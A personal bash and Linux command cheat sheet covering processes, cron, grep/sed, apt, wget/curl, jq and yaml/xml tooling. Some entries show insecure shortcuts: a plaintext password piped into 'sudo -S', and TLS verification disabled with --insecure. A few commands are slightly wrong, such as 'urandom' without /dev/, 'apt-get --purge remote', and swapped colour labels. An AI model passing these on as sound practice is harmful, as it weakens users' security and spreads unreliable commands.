resume process by number into list 'jobs'

fg 2

shell replacing, redirect output to file, fork new process start

bash
exec > output-file.txt
date
# the same as 'exit'
exec <&-
cat output-file.txt

output to file with variable, output to variable

gen_version="5.2.1"
$(find /mapr/dp.prod/vantage/data/processed/gen/$gen_version/ -maxdepth 5 -mindepth 5 | awk -F '/' '{print $14}' > gt-$gen_version.list)

execute command and exit

bash
exec ls -la

execute command from string, execute string, run string

echo "ls" | xargs -i sh -c "{}"

xargs with multiple arguments

find . | xargs -I % sh -c 'md5sum %; ls -la %;'

run clear/naked/without_scripts/empty/zero terminal without bashrc

bash --norc --noprofile

capture terminal output to file, save output of the commands to file, save log/history of terminal output

script output-file-name.txt

{my commands }

exit
cat output-file-name.txt

disconnect from terminal and let command be runned

ctrl-Z
disown -a && exit

postponed execution, execute command by timer, execute command from now, timer command

for graphical applications DISPLAY must be specified

  • using built-in editor
at now + 5 minutes
at> DISPLAY=:0 rifle /path/to/image
^D
  • using inline execution
echo "DISPLAY=:0 rifle /path/to/image/task.png" | at now + 1 min
echo "DISPLAY=:0 rifle /path/to/image/task.png" | at 11:01

print all files that process is reading

strace -e open,access <command to run application>

find process by name

ps fC firefox
pgrep firefox

pid of process by name

pidof <app name>
pidof chrome

process by id

ll /proc/${process_id}
# process command line
cat /proc/${process_id}/cmdline

current process id parent process id

echo $$
echo ${PPID}

process list, process tree

# process list with hierarchy 
ps axjf
ps -ef --forest
ps -fauxw

# process list full command line, ps full cmd
ps -ef ww 

# list of processes by user
ps -ef -u my_special_user

process list without ps

links to processes

ls -l /proc/*/exe
ls -l /proc/*/cwd
cat /proc/*/cmdline

process full command, ps full, ps truncate

ps -ewwo pid,cmd

threads in process

ps -eww H -p $PROCESS_ID

windows analogue of 'ps aux'

wmic path win32_process get Caption, Processid, Commandline

kill -3

output to log stop process

remove except one file

rm -rf  -- !(exclude-filename.sh)

cron

You have to escape the % signs with % where is file located

sudo less /var/spool/cron/crontabs/$USER

cron activating

sudo service cron status

all symbols '%' must be converted to '%'

# edit file 
# !!! last line should be empty !!!
crontab -e
# list of all jobs
crontab -l

adding file with cron job

echo " * * * * echo `date` >> /out.txt" >> print-date.cron
chmod +x print-date.cron
crontab print-date.cron

example of cron job with special parameters

HOME=/home/ubuntu
0 */6 * * * /home/ubuntu/list-comparator-W3650915.sh >/dev/null 2>&1
9 */6 * * * /home/ubuntu/list-comparator-W3653989.sh >/dev/null 2>&1
# each 6 hours in specific hour
25 1,7,13,19 * * * /home/ubuntu/list-comparator-W3651439.sh >/dev/null 2>&1

logs

sudo tail -f /var/log/syslog

is cron running

ps -ef | grep cron | grep -v grep

start/stop/restart cron

systemctl start cron
systemctl stop cron
systemctl restart cron

skip first line, pipe skip line

# skip first line in output
docker ps -a | awk '{print $1}' | tail -n +2

error to null

./hbase.sh 2>/dev/null

stderr to stdout, error to out

sudo python3 echo.py > out.txt 2>&1 &
sudo python3 echo.py &> out.txt &
sudo python3 echo.py > out.txt &

grep with line number

grep -nr "text for search" .

grep only in certain folder without recursion, grep current folder, grep in current dir

# need to set * or mask for files in folder !!!
grep -s "search_string" /path/to/folder/*
sed -n 's/^search_string//p' /path/to/folder/*

# grep in current folder
grep -s "search-string" * .*

grep before

grep -B 4
grep --before 4

grep after

grep -A 4
grep --after 4
printf "# todo\n## one\n### description for one\n## two\n## three" | grep "[#]\{3\}"
# printf is sensitive to --- strings
### grep boundary between two numbers
printf "# todo\n## one\n### description for one\n## two\n## three" | grep "[#]\{2,3\}"
printf "# todo\n## one\n### description for one\n## two\n## three" | grep --extended-regexp "[#]{3}"
### grep regexp 
## characters
# [[:alnum:]]	All letters and numbers.	"[0-9a-zA-Z]"
# [[:alpha:]]	All letters.	                "[a-zA-Z]"
# [[:blank:]]	Spaces and tabs.         	[CTRL+V<TAB> ]
# [[:digit:]]	Digits 0 to 9.	                [0-9]
# [[:lower:]]	Lowercase letters.	        [a-z]
# [[:punct:]]	Punctuation and other characters.	"[^a-zA-Z0-9]"
# [[:upper:]]	Uppercase letters.	        [A-Z]
# [[:xdigit:]]	Hexadecimal digits.	        "[0-9a-fA-F]"
	
## quantifiers
# *	Zero or more matches.
# ?	Zero or one match.
# +	One or more matches.
# {n}	n matches.
# {n,}	n or more matches.
# {,m}	Up to m matches.
# {n,m}	From n up to m matches.
du -ah .  | sort -r | grep -E "^[0-9]{2,}M"

grep between, print between lines

oc describe pod/gateway-486-bawfps | awk '/Environment:/,/Mounts:/'

grep text into files

grep -rn '.' -e '@Table'
grep -ilR "@Table" .

grep OR operation

cat file.txt | grep -e "occurence1" -e "occurence2"
cat file.txt | grep -e "occurence1\|occurence2"

grep AND operation

cat file.txt | grep -e "occurence1.*occurence2"

grep not included, grep NOT

cat file.txt | grep -v "not-include-string"
cat file.txt | grep -v -e "not-include-string" -e "not-include-another"

grep with file mask

grep -ir "memory" --include="*.scala"

grep with regexp, grep regexp

grep -ir --include=README.md ".*base" 2>/dev/null
echo "BN_FASDLT/1/20200624T083332_20200624T083350_715488_BM60404_BN_FASDLT.MF4" | awk -F "/" '{print $NF}' | grep "[0-9]\{8\}"
echo "185.43.224.157" | grep '^[0-9]\{1,3\}\.'
echo "185.43.224.157" | egrep '^[0-9]{1,3}\.'
echo "185.43.224.157" | egrep '^[0-9][0-9]+[0-9]+\.'

grep with filename

grep  -rH -A 2 "@angular/core"

grep without permission denied

grep -ir --include=README.md "base" 2>/dev/null

grep filename, grep name

grep -lir 'password'

inner join for two files, compare string from different files

grep -F -x -f path-to-file1 path-to-file2
grep --fixed-strings --line-regexp -f path-to-file1 path-to-file2

difference between two files without spaces

diff -w file1.txt file2.txt

show difference in lines with context

diff -c file1.txt file2.txt

show equal lines ( reverse diff )

fgrep -xf W3651292.sh W3659261.sh

show difference between two dates, date difference, time difference

apt install dateutils
dateutils.ddiff -i '%Y%m%d%H%M%S' -f '%y %m %d %H %M %S' 20160312000101 20170817040001

adjust time, adjust clock, sync clock, computer clock

/etc/systemd/timesyncd.conf.d/90-time-sync.conf

[Time]
NTP=ntp.ubuntu.com
FallbackNTP=ntp.ubuntu.com

restart time sync service

timedatectl set-ntp true && systemctl restart systemd-timesyncd.service

replace character into string

array = echo $result | tr {}, ' ' 

change case of chars ( upper, lower )

echo "hello World" | tr '[:lower:]' '[:upper:]

replace all chars

echo "hello World 1234 woww" | tr -dc 'a-zA-Z'

replace text in all files of current directory, replace inline, replace inplace, inline replace, sed inplace

sed --in-place 's/LinkedIn/Yahoo/g' *
# replace tab symbol with comma symbol
sed --in-place 's/\t/,/g' one_file.txt

# in case of error like: couldn't edit ... not a regular file
grep -l -r "LinkedIn" | xargs sed --in-place s/LinkedIn/Yahoo/g

# sed for folder sed directory sed for files
find . -type f -exec sed -i 's/import com.fasterxml.jackson.module.scala.DefaultScalaModule;//p' {} +

no editor replacement, no vi no vim no nano, add line without editor, edit property without editor

# going to add new line in property file without editor
sed --in-place 's/\[General\]/\[General\]\nenable_trusted_host_check=0/g' matomo-php.ini

timezone

timedatectl | grep "Time zone"
cat /etc/timezone

date formatting, datetime formatting, timestamp file, file with timestamp

# print current date
date +%H:%M:%S:%s
# print date with timestamp
date -d @1552208500 +"%Y%m%dT%H%M%S"
date +%Y-%m-%d-%H:%M:%S:%s
# output file with currenttime file with currenttimestamp
python3 /imap-message-reader.py > message_reader`date +%H:%M:%S`.txt

timestamp to T-date

function timestamp2date(){
    date -d @$(( $1/1000000000 )) +"%Y%m%dT%H%M%S"
}
timestamp2date 1649162083168929800

generate random string

openssl rand -hex 30
# or 
urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | tr '[:upper:]' '[:lower:]' | head -n 1

find inside zip file(s), grep zip, zip grep

zgrep "message_gateway_integration" /var/lib/brand-server/cache/zip/*.zip

grep zip, find inside zip, inside specific file line of text

ls -1 *.zip | xargs -I{} unzip -p {} brand.xml  | grep instant-limit | grep "\\."

unzip into specific folder

unzip file.zip -d output_folder

unzip without asking for action

unzip -o file.zip -d output_folder

unzip one file

unzip -l $ARCHIVE_NAME
unzip $ARCHIVE_NAME path/to/file/inside

7zip

sudo apt install p7zip-full

7za l archive.7z
7za x archive.7z	

tar archiving tar compression

# tar create
tar -cf jdk.tar 8.0.265.j9-adpt
# tar compression
tar -czvf jdk.tar.gz 8.0.265.j9-adpt

untar

# tar list of files inside
tar -tf jdk.tar

# tar extract untar
tar -xvf jdk.tar -C /tmp/jdk
# extract into destination with removing first two folders
tar -xvf jdk.tar -C /tmp/jdk --strip-components=2
# extract from URL untar from url
wget -qO- https://nodejs.org/dist/v10.16.3/node-v10.16.3-linux-x64.tar.xz | tar xvz - -C /target/directory

pipeline chain 'to file'

echo "hello from someone" | tee --append out.txt
echo "hello from someone" | tee --append out.txt > /dev/null

vi

vi wrap( :set wrap, :set nowrap )
shortcut description
/ search forward
? search backward
n next occurence
N prev occurence

command prompt change console prompt console invitation

.bashrc of ubuntu

export PS1="my_host $(date +%d%m_%H%M%S)>"
if [ "$color_prompt" = yes ]; then
#    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@$(date +%d%m_%H%M)\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '

else
#    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
    PS1='${debian_chroot:+($debian_chroot)}\u:\$(date +%d.%m_%H:%M)\w\$ '

fi
unset color_prompt force_color_prompt
export PROMPT_COMMAND="echo -n \[\$(date +%H:%M:%S)\]\ "

command line color prompt color console

# green
export PS1=`printf "\033[31m$ staging \033[39m"`
# red
export PS1=`printf "\033[32m$ staging \033[39m"`
Color	Foreground	Background
Black	\033[30m	\033[40m
Red	\033[31m	\033[41m
Green	\033[32m	\033[42m
Orange	\033[33m	\033[43m
Blue	\033[34m	\033[44m
Magenta	\033[35m	\033[45m
Cyan	\033[36m	\033[46m
Light gray	\033[37m	\033[47m
Fallback to distro's default	\033[39m	\033[49m

last executed exit code

echo $?

memory dump

cat /proc/meminfo

memory limit memory usage

cat /sys/fs/cgroup/memory/memory.limit_in_bytes
cat /sys/fs/cgroup/memory/memory.usage_in_bytes

max open files

cat /proc/sys/fs/file-max

open file by type, open image

mimetype -d {filename}
xdg-open {filename}
w3m {filename}

open in browser, open url

sensible-browser http://localhost:3000/api/status
x-www-browser http://localhost:3000/api/status
# for MacOS
open http://localhost:3000/api/status

wget post

wget --method=POST http://{host}:9000/published/resources/10050001.zip

wget to console

wget -O- http://{host}:8500/wd-only/getBrandXml.jsp?brand=229099017 > /dev/null  2>&1

wget to console without additional info

wget -nv -O- http://{host}:8500/wd-only/getBrandXml.jsp?brand=229099017 2>/dev/null

wget to specific file, download file to specific file

wget -O out.zip http://{host}:9000/published/resources/10050001.zip
# in case of complex output path
curl -s http://{host}:9000/published/resources/10050001.zip --create-dirs -o /home/path/to/folder/file.zip

wget to specific folder

wget http://host:9090/wd-only/1005000.zip --directory-prefix="/home/temp/out"

wget https without checking certificate

wget --no-check-certificate https://musan999999.mueq.adas.intel.com:8888/data-api/session/

wget with user wget with credentials

wget --user $ARTIFACTORY_USER --password $ARTIFACTORY_PASS $ARTIFACTORY_URL

wget with specific timeout

wget --tries=1 --timeout=5 --no-check-certificate https://musan999999.mueq.adas.intel.com:8888/data-api/session/

wget proxy, wget via proxy

wget -e use_proxy=yes -e http_proxy=127.0.0.1:7777 https://mail.ubsgroup.net/

or just with settings file "~/.wgetrc"

use_proxy = on
http_proxy =  http://username:[email protected]:port/
https_proxy =  http://username:[email protected]:port/
ftp_proxy =  http://username:[email protected]:port/

or via socks5

all_proxy=socks5://proxy_host:proxy_port wget https://mail.ubsgroup.net

zip files, zip all files

zip -r bcm-1003.zip *

zip file with password zip protect with password

zip --encrypt 1.zip 1.html

zip file without saving path, zip path cleanup

zip --junk_paths bcm-1003.zip *

using parameters for aliases

alias sublime_editor=/Applications/SublimeEditor/Sublime

subl(){
  sublime_editor "$1" &
}

print alias, print function

alias sublime_editor
type subl

sed cheat sheet, sed replace

replace "name" with "nomen" string
sed 's/name/nomen/g'

# replace only second occurence
# echo "there is a test is not a sentence" | sed 's/is/are/2'

example of replacing all occurences in multiply files

for each_file in `find -iname "*.java"`; do
	sed --in-place 's/vodkafone/cherkavi/g' $each_file
done

sed add prefix add suffix replace in line multiple commands

echo "aaaa find_string bbbb " | sed 's/find_string/replace_to/g' | sed 's/"//g; s/$/\/suffix/; s/^/\/prefix/'
# remove line with occurence
sed --in-place '/.*jackson\-annotations/d' $each_file

print line by number from output, line from pipeline, print one line from file

locate -ir "/zip$" | sed -n '2p'
cat out.txt | sed -n '96p'

issue with windows/unix carriage return

/usr/bin/bash^M: bad interpreter: No such file or directory

solution

sed -i -e 's/\r$//' Archi-Ubuntu.sh 

calculate amount of strings

ps -aux | awk 'BEGIN{a=0}{a=a+1}END{print a}'

boolean value

true
false

last changed files, last updated file

find -cmin -2

temp file temporary file create temp file

mktemp

chmod recursively

chmod -R +x <folder name>

# remove world access 
chmod -R o-rwx /opt/sm-metrics/grafana-db/data
# remove group access
chmod -R g-rwx /opt/sm-metrics/grafana-db/data
# add rw access for current user
chmod u+rw screenshot_overlayed.png
find . -iname "*.sql" -print0 | xargs -0 chmod 666

create dozen of folders using one-line command

mkdir -p some-folder/{1..10}/{one,two,three}

execute command with environment variable, new environment variable for command

ONE="this is a test"; echo $ONE

activate environment variables from file, env file, export env, export all env, all variable from file, all var export, env var file

FILE_WITH_VAR=.env.local
source $FILE_WITH_VAR
export $(cut -d= -f1 $FILE_WITH_VAR)

# if you have comments in file
source $FILE_WITH_VAR
export `cat $FILE_WITH_VAR | awk -F= '{if($1 !~ "#"){print $1}}'`

system log file

/var/log/syslog

Debian install package via proxy, apt install proxy, apt proxy, apt update proxy

sudo http_proxy='http://user:@proxy.muc:8080' apt install meld

proxy places, change proxy, update proxy, system proxy

remember about escaping bash spec chars ( $,.@.... )

  • .bashrc
  • /etc/environment
  • /etc/systemd/system/docker.service.d/http-proxy.conf
  • /etc/apt/auth.conf
Acquire::http::Proxy "http://username:password@proxyhost:port";
Acquire::https::Proxy "http://username:password@proxyhost:port";
  • snap
sudo snap set system proxy.http="http://user:[email protected]:8080"
sudo snap set system proxy.https="http://user:[email protected]:8080"

snap installation issue

# leads to error: cannot connect to the server
snap install <app>

# Unmask the snapd.service:
sudo systemctl unmask snapd.service

# Enable it:
systemctl enable snapd.service

# Start it:
systemctl start snapd.service

install version of app, install specific version, accessible application version

sudo apt list -a [name of the package]
sudo apt list -a kubeadm

install package for another architecture, install x86 on x64

dpkg --add-architecture i386
dpkg --print-architecture
dpkg --print-foreign-architectures
sudo apt-get install libglib2.0-0:i386 libgtk2.0-0:i386

installed package check package information

apt list <name of package>
apt show <name of package>

apt package description

apt-cache show terminator

apt cache

cd /var/cache/apt/archives

apt force install

sudo apt install --fix-broken -o Dpkg::Options::="--force-overwrite" {package name}

package update package mark

apt mark hold kubeadm
# install: this package is marked for installation.
# deinstall (remove): this package is marked for removal.
# purge: this package, and all its configuration files, are marked for removal.
# hold: this package cannot be installed, upgraded, removed, or purged.
# unhold: 
# auto: auto installed
# manual: manually installed

Debian update package

sudo apt-get install --only-upgrade {packagename}

Debian list of packages

sudo apt list
sudo dpkg -l
First letter desired package state ("selection state")
u unknown
i install
r remove/deinstall
p purge (remove including config files)
h hold
Second letter current package state
n not-installed
i installed
c config-files (only the config files are installed)
U unpacked
F half-configured (configuration failed for some reason)
h half-installed (installation failed for some reason)
W triggers-awaited (package is waiting for a trigger from another package)
t triggers-pending (package has been triggered)
Third letter error state (you normally shouldn't see a third letter, but a space, instead)
R reinst-required (package broken, reinstallation required)

Debian list the versions available in your repo

sudo apt-cache madison {package name}

Debian install new version of package with specific version

sudo apt-get install {package name}={version}

Debian system cleanup

# clean cache
sudo du -sh /var/cache/apt
sudo apt-get clean

# remove unused packages
sudo apt-get autoremove --purge

# remove old journal records
journalctl --disk-usage
sudo journalctl --vacuum-time=5d

uninstall specific app

sudo apt-get --purge remote {app name}

remove service ( kubernetes )

  • sudo invoke-rc.d localkube stop
  • sudo invoke-rc.d localkube status ( sudo service localkube status )
  • sudo update-rc.d -f localkube remove
  • sudo grep -ir /etc -e "kube"
  • rm -rf /etc/kubernetes
  • rm -rf /etc/systemd/system/localkube.service
  • vi /var/log/syslog

last executed code, last script return value

echo $?

remove VMWare player

sudo vmware-installer -u vmware-player

version of OS linux version os information distribution name OS name

  • lsb_release -a
  • cat /etc/*-release
  • uname -a
  • . /etc/os-release

sudo without password, apple keyboard, sudo script without password

echo 'password' | sudo -S bash -c "echo 2 > /sys/module/hid_apple/parameters/fnmode" 2>/dev/null

default type, detect default browser, mime types, default application set default app

xdg-mime query default x-scheme-handler/http

## where accessible types
# echo $XDG_DATA_DIRS # avaialible in applications
# locate google-chrome.desktop
# /usr/share/applications/google-chrome.desktop

## set default browser 
xdg-mime default firefox.desktop x-scheme-handler/http
xdg-mime default firefox.desktop x-scheme-handler/https
xdg-settings set default-web-browser firefox.desktop

## check default association
cat ~/.config/mimeapps.list
cat /usr/share/applications/defaults.list

or change your alternatives

locate x-www-browser
# /etc/alternatives/x-www-browser

open in default browser

x-www-browser http://localhost:9090

alternatives

set default browser

# display
sudo update-alternatives --display x-www-browser
sudo update-alternatives --query x-www-browser
sudo update-alternatives --install /usr/bin/x-www-browser x-www-browser /usr/bin/chromium-browser 90

# config
sudo update-alternatives --config x-www-browser

# remove
sudo update-alternatives --remove x-www-browser /snap/bin/chromium
sudo update-alternatives --remove x-www-browser /usr/bin/chromium

java set default

update-alternatives --install /usr/bin/java java $JAVA_HOME/bin/java 10

open file with default editor, default viewer, with more appropriate viewr

# ranger should be installed 
rifle <path to file>

cat replacement bat

# apt install bat - not working sometimes
cargo install bat
batcat textfile
# alias bat=batcat
bat textfile

install haskell

sudo apt-get install haskell-stack
stack upgrade
stack install toodles

get started with hackell

check architecture

dpkg --add-architecture i386
dpkg --print-architecture
dpkg --print-foreign-architectures

calendar, week number

gcal --with-week-number

cURL command

~/.netrc

machine my-secret-host.com login my-secret-login password my-secret-password
machine my-secret-host2.com login my-secret-login2 password my-secret-password2
curl --netrc --request GET my-secret-host.com/storage/credentials 

return code 0 if 200, curl return code

curl --fail --request GET 'https://postman-echo.com/get?foo1=bar1&foo2=bar2'

curl with authentication

curl --request POST \
--data "client_id=myClient" \
--data "grant_type=client_credentials" \
--data "scope=write" \
--data "response_type=token" \
--cert "myClientCertificate.pem" \
--key "myClientCertificate.key.pem" \
"https://openam.example.com:8443/openam/oauth2/realms/root/access_token"

# {
#   "access_token": "sbQZ....",
#   "scope": "write",
#   "token_type": "Bearer",
#   "expires_in": 3600
# }

echo server mock server

curl --location --request GET 'https://postman-echo.com/get?foo1=bar1&foo2=bar2'

curl username, curl with user and password, curl credentials

curl -u username:password http://example.com
# basic authentication
echo -n "${username}:${password}" | base64
curl -v --insecure -X GET "https://codebeamer.ubsgroup.net:8443/cb/api/v3/wikipages/21313" -H "accept: application/json" -H "Authorization: Basic "`echo -n $TSS_USER:$TSS_PASSWORD | base64`

# bearer authentication
curl --insecure --location --oauth2-bearer $KEYCLOAK_TOKEN "https://portal.apps.devops.vantage.org/session-lister/v1/sessions/cc17d9f8-0f96-43e0-a0dc-xxxxxxx"

# or with certificate 
curl  --cacert /opt/CA.cer --location --oauth2-bearer $KEYCLOAK_TOKEN "https://portal.apps.devops.vantage.org/session-lister/v1/sessions/cc17d9f8-0f96-43e0-a0dc-xxxxxxx"

curl head

curl --head http://example.com

curl redirect, redirect curl, curl 302 response

curl -L http://example.com

curl PUT example with file

curl -X PUT --header "Content-Type: application/vnd.wirecard.brand.apis-v1+json;charset=ISO-8859-1" -H "x-username: cherkavi" [email protected] http://q-brands-app01.wirecard.sys:9000/draft/brands/229099017/model/country-configurations

curl POST example POST request

curl -X POST http://localhost:8983/solr/collection1/update?commit=true \
-H "Content-Type: application/json" --data '{"add":"data"}'

curl -X POST http://localhost:8983/solr/collection1/update?commit=true \
-H "Content-Type: application/json" --data-raw '{"add":"data"}'

curl -X POST http://localhost:8983/solr/collection1/update?commit=true \
-H "Content-Type: application/json" --data-binary '{"add":"data"}'

# encoding special symbols curl special symbols
curl -X POST http://localhost:8983/solr/collection1/update?commit=true \
-H "Content-Type: application/json" --data-urlencode '{"add":"Tom&Jerry"}'

# or with bash variable
SOME_DATA="my_personal_value"
curl -X POST http://localhost:8983/solr/collection1/update?commit=true -H "Content-Type: application/json" --data-binary '{"add":"'$SOME_DATA'"}'

# or with data from file
curl -X POST http://localhost:8983/test -H "Content-Type: application/json" --data-binary '@/path/to/file.json'

# or with multipart body
curl -i -X POST -H "Content-Type: multipart/form-data" -F "[email protected]" -F "userid=1234" http://mysuperserver/media/upload/
# multiline body
curl -X 'POST' $SOME_HOST \
  -H 'accept: application/json' \
  -H 'Content-Type: application/json' \
  -d '{
  "bdcTimestamp": 6797571559111,
  "comment": "Some comment",
  "loggerTimestamp": 1623247031477189001,
  }'
# curl with inline data curl here document curl port document here pipe
json_mappings=`cat some_file.json`
response=`curl -X POST $SOME_HOST -H 'Content-Type: application/json' \
-d @- << EOF
{
	"mappings": $json_mappings,
	"settings" : {
        "index" : {
            "number_of_shards" : 1,
            "number_of_replicas" : 0
        }
    }
}
EOF
`
echo $response
# POST request GET style
curl -X POST "http://localhost:8888/api/v1/notification/subscribe?email=one%40mail.ru&country=2&state=517&city=qWkbs&articles=true&questions=true&listings=true" -H "accept: application/json"

curl escape, curl special symbols

# https://kb.objectrocket.com/elasticsearch/elasticsearch-cheatsheet-of-the-most-important-curl-requests-252
curl -X GET "https://elasticsearch-label-search-prod.vantage.org/autolabel/_search?size=100&q=moto:*&pretty"

escape single quotas

echo "'" 'sentence' "'"

curl without progress, curl silent

curl certificate skipping, curl ssl, curl https, curl skip ssl

curl --insecure -s -X GET http://google.com

curl with additional output, curl verbosive mode

curl --verbose --insecure -s -X GET http://google.com

curl cookie, curl header cookie

chrome extension cookies.txt

# send predefined cookie to url
curl -b path-to-cookie-file.txt -X GET url.com

# send cookie from command line
curl --cookie "first_cookie=123;second_cookie=456;third_cookie=789" -X GET url.com

# send cookie from command line 
curl 'http://localhost:8000/members/json-api/auth/user' -H 'Cookie: PHPSESSID=5c5dddcd96b9f2f41c2d2f87e799feac'

# collect cookie from remote url and save in file
curl -c cookie-from-url-com.txt -X GET url.com

curl binary

python3 ${HOME_PROJECTS_GITHUB}/python-utilities/html-scraping/binary-html/beautifulsoup.py https://amazon.de

string encoding for http

sudo apt install gridsite-clients
urlencode "- - -"

curl with encoding to another codepage, translate/convert from win1251 to utf8

curl "http://some.resource/read_book.php?id=66258&p=1" | iconv --from-code WINDOWS-1251 --to-code UTF-8

iconv --list
cat "$INPUT_FILE" | iconv -t UNICODE//IGNORE

curl status code, curl response code, curl duration

airflow_trigger(){
  SESSION_ID=$1
  ENDPOINT=$2
  BODY='{"conf":{"session_id":"'$SESSION_ID'","branch":"merge_labels"}}'
  curl --silent -w "response-code: %{http_code}\n   time: %{time_starttransfer}" --data-binary $BODY -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X POST $ENDPOINT
  return $?
}
DAG_NAME='labeling'
airflow_trigger $each_session "https://airflow.vantage.org/api/experimental/dags/$DAG_NAME/dag_runs"
curl --show-error "http://some.resource/read_book.php?id=66258&p=1"

curl execution time

curl --max-time 10 -so /dev/null -w '%{time_total}\n' google.com

curl script curl replacement

curl "https://{foo,bar}.com/file_[1-4].webp" --output "#1_#2.webp"

json

# installation 
pip3 install jc
apt-get install jc

# parse general output to json
jc --pretty ls -la
# using predefined parser
dig www.google.com | jc --dig --pretty
echo '{"a": 10, "b": "kitchen"}' | spyql -Otable=my_table "SELECT  json.a as indicator_value, json.b as place FROM json TO sql" 
echo '{"loggerTimestamp": 1657094097468421888}' | jq .
# {
#  "loggerTimestamp": 1657094097468422000
# }

jq is not working properly with "-" character in property name !!!
jq is not working sometimes with "jq any properties", need to split them to two commands

docker network inspect mysql_web_default | jq '.[0].Containers' | jq .[].Name
echo '[{"id": 1, "name": "Arthur", "age": "21"},{"id": 2, "name": "Richard", "age": "32"}]' | \
jq ".[] | .name"

# json output pretty print, json pretty print, json sort
echo output.json | jq .
# sort by keys
echo output.json | jq -S .

# jq select with condition
jq -e 'select(.[].name == "CP_END")' $SESSION_METADATA_FOLDER/$SESSION_ID
echo $? # return 0 only when met the condition, otherwise - 1

# .repositories[].repositoryName
aws ecr describe-repositories | jq '.repositories[] | select(.repositoryName == "cherkavi-udacity-github-action-fe")'

# jq filter by condition
docker network inspect mysql_web_default | jq '.[0].Containers' | jq '.[] | select(.Name=="web_mysql_ui")' | jq .IPv4Address

# jq create another document filter json transform json
echo '[{"id": 1, "name": "Arthur", "age": "21"},{"id": 2, "name": "Richard", "age": "32"}]' | jq '[.[] | {id, name} ]'
echo '[{"id": 1, "name": "Arthur", "age": "21"},{"id": 2, "name": "Richard", "age": "32"}]' | jq '[.[] | {number:.id, warrior:.name} ]'
	
# jq convert to csv
echo '[{"id": 1, "name": "Arthur", "age": "21"},{"id": 2, "name": "Richard", "age": "32"}]' | \
jq '.[] | if .name == "Richard" then . else empty end | [.id, .name] | @csv'

# jq as a table
echo '[{"id": 1, "name": "Arthur", "age": "21"},{"id": 2, "name": "Richard", "age": "32"}]' | jq -r '["ID","NAME"], ["--","------"], (.[] | [.id,.name]) | @tsv' 
	
# jq get first element
echo '[{"id": 1, "name": "Arthur", "age": "21"},{"id": 2, "name": "Richard", "age": "32"}]' | jq '.[0] | [.name, .age] | @csv'

# convert from yaml to json, retrieve values from json, convert to csv
cat temp-pod.yaml | jq -r -j --prettyPrint | jq '[.metadata.namespace, .metadata.name, .spec.template.spec.nodeSelector."kubernetes.io/hostname"] | @csv'

# multiply properties from sub-element
aws s3api list-object-versions --bucket $AWS_S3_BUCKET_NAME --prefix $AWS_FILE_KEY | jq '.Versions[] | [.Key,.VersionId]'

echo '{"smart_collections":[{"id":270378401973},{"id":270378369205}]}' | jq '. "smart_collections" | .[] | .id'

jq 'if .attributes[].attribute == "category" and (.attributes[].normalizedValues != null) and (.attributes[].normalizedValues | length )>1 then . else empty end'
	
# jq remove quotas raw text
jq -r ".DistributionList.Items[].Id"

# jq escape symbols
kubectl get nodes -o json | jq -r '.items[].metadata.annotations."alpha.kubernetes.io/provided-node-ip"'

# edit variables inside JSON file
ENV_DATA=abcde
jq --arg var_a "$ENV_DATA" '.ETag = $var_a' cloud_front.json
jq '.Distribution.DistributionConfig.Enabled = false' cloud_front.json

json compare json diff

cmp <(jq -cS . A.json) <(jq -cS . B.json)
diff <(jq --sort-keys . A.json) <(jq --sort-keys . B.json)
# export JSON_COMPARE_SUPPRESS_OUTPUT=""
export JSON_COMPARE_SUPPRESS_OUTPUT="true"
python3 jsoncompare.py  $FOLDER_CSV/$SESSION_ID $FOLDER/$SESSION_ID

yaml

pip install yamlpath

yaml get value by xpath

echo '
first: 
  f_second: one_one
second: 2
' | yaml-get -p first.f_second
# one_one

yaml search for xpath, print files with values in xpath

echo '
first: 
  f_second: one_one
second: 2
' | yaml-paths --search=%one

yaml edit by xpath ( scalars only )

echo '
first: one
second: 2 
' | yaml-set -g first --value=1
# ---
# first: 1
# second: 2

yaml difference between two yaml files

echo '
second: 2
first: 
  f_second: one_one
' > temp_1.yaml
echo '
first: 
  f_second: one_two
second: 2
' > temp_2.yaml
yaml-diff temp_1.yaml temp_2.yaml
# < "one_one"
# ---
# > "one_two"
# read value
cat k8s-pod.yaml | yq r - --printMode pv  "metadata.name"

# convert to JSON
cat k8s-pod.yaml | yq - r -j --prettyPrint
# convert yaml to json|props|xml|tsv|csv
cat k8s-pod.yaml | yq --output-format json

# yaml remove elements clear ocp fields
yq 'del(.metadata.managedFields,.status,.metadata.uid,.metadata.resourceVersion,.metadata.creationTimestamp,.spec.clusterIP,.spec.clusterIP)' service-data-api-mdf4download-service.yaml

# yaml editor 
yq 'del(.metadata.managedFields,.status,.metadata.uid,.metadata.resourceVersion,.metadata.creationTimestamp,.spec.clusterIP,.spec.clusterIP),(.metadata.namespace="ttt")' service-data-api-mdf4download-service.yaml

yq converter

# convert yaml to json|props|xml|tsv|csv
cat file.yaml | yq --output-format json

xml

parsing xml parsing xml processing

xq

# installation
pip3 install xq
# xq usage ??? is it not working as expected ????

parse xml with xpath

# installation
sudo apt install libxml-xpath-perl
# parse xml from stdin
curl -s https://www.w3schools.com/xml/note.xml | xpath -e '/note/to | /note/from'
curl -s https://www.w3schools.com/xml/note.xml | xpath -e '/note/to/text()'

parse xml with xmllint

# installation
sudo apt  install libxml2-utils

## usage
TEMP_FILE=$(mktemp)
curl -s https://www.w3schools.com/xml/note.xml > $TEMP_FILE
xmllint --xpath '//note/from' $TEMP_FILE
xmllint --xpath 'string(//note/to)' $TEMP_FILE
xmllint --xpath '//note/to/text()' $TEMP_FILE

# avoid xmllint namespace check
xmllint --xpath "//*[local-name()='project']/*[local-name()='modules']/*[local-name()='module']/text()" pom.xml
# avoid issue with xmllint namespace
cat pom.xml | sed '2 s/xmlns=".*"//g' | xmllint --xpath "/project/modules/module/text()" -

# debug xml xpath debug 
xmllint --shell  $TEMP_FILE
rm $TEMP_FILE

xml pretty print, xml format

xmllint --format /path/to/file.xml > /path/to/file-formatted.xml

xml validation

xmllint --noout file.xml; echo $?

html

html prettifier

cat index.html | grep tidy

parse html parsing

# sudo apt install libxml-xpath-perl
xpath -e $path $filename
# Parse HTML and extract specific elements
xmllint --html --xpath  $path $filename

hq installation

pip install hq

# or https://pypi.org/project/hq/0.0.4/#files
# sudo python3 setup.py install

hq usage

